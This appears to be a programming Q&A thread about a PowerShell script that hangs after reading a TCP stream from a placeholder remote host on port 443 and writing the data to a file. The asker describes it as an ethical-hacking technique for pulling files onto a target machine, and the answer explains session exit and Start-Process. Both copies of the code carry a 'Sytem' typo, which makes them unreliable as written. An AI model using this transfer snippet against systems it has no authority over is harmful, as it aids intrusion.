# Exit foreground script Powershell: script hangs and Ctrl+C doesn't work

Tags: powershell, sockets

I have a powershell script running as follows:

```
> $client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);[Sytem.IO.File]::AppendAllText('<path\to\file>', $data)};$client.Close();
```

It connects, reads the stream, writes to file, but does not exit. I then try to use Ctrl+C and it does not work.

I want it to exit when it has finished reading the file, also would like to know why it doesn't exit using Ctrl+C like on Linux.

Comment: Where is closing `}` (_Right Curly Bracket_) in your code snippet?

Comment: Typo. Not part of the question.

Comment: If this is a script, why is all this on one line? What you have is not a one-liner, and using the semi-colons does not make it one. These semi-colons are code terminators, not pipelines. Also you have random semi-colons in the block. PowerShell is of course is not Linux, and expecting it to act like Linux should never be an expectation and vice versa.

Comment: Hey, this is indeed for ethical hacking and one of the techniques I was interested in for when powercat is not installed on the target machine.

Answer (score 2, accepted):

If you are in a PowerShell session and run this code, it is in the current session. Once your code completes, you get returned to the Powershell prompt from where you started the code. Thus your code is closed, not your session.

CRTL+C does not close PowerShell after your code has run, exit does.

You are only closing the Socket connection object. You are not exiting the PowerShell session from where you started it.

```
# Open the TCP socket
$client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',443)

# Initialize the stream
$stream = $client.GetStream()


[byte[]]$bytes = 0..65535 | 
ForEach{0}

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    # Collect the data
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)

    # Write data to file
    [Sytem.IO.File]::AppendAllText('<path\to\file>', $data)
}

# Clear the stream
$stream.Flush()

# Close the TCP socket
$client.Close()

# Code complete, exiting PowerShell
Exit
```

If you want to run a foreground code block from a PowerShell session, You can use Start-Process.

For example:

```
# Start a new foreground PowerShell session to run this code
Start-Process -FilePath PowerShell -ArgumentList Get-Date
```

You don't need exit doing this or CRTL+C efforts, as it will autoclose the session once the code is done.

See the help files on how to leverage Start-Process options and the PowerShell command-line options.

```
# Get specifics for a module, cmdlet, or function
(Get-Command -Name Start-Process).Parameters
(Get-Command -Name Start-Process).Parameters.Keys
Get-help -Name Start-Process -Examples
Get-help -Name Start-Process -Full
Get-help -Name Start-Process -Online

Powershell /?
```

Comment: Thanks for this, really helpful :) yeh I just mean it hangs and doesn't return to the prompt. I will learn more about powershell anyway. Thanks again!

Comment: No worries. So, the hang is obviously something different. Yet, using the Start-PRocess approach, it has a -Wait for switch as does PowerShell via -NoExit, so you can see what is happening, then if it hangs, just click the close button or use ALT+F4 as you would close other apps or even Stop-Process, or taskkill to close it. If you are calling an external executable in that stream, then you need to think this out more, since that may need more effort.

Comment: So there's no way to get control back without killing your session, right?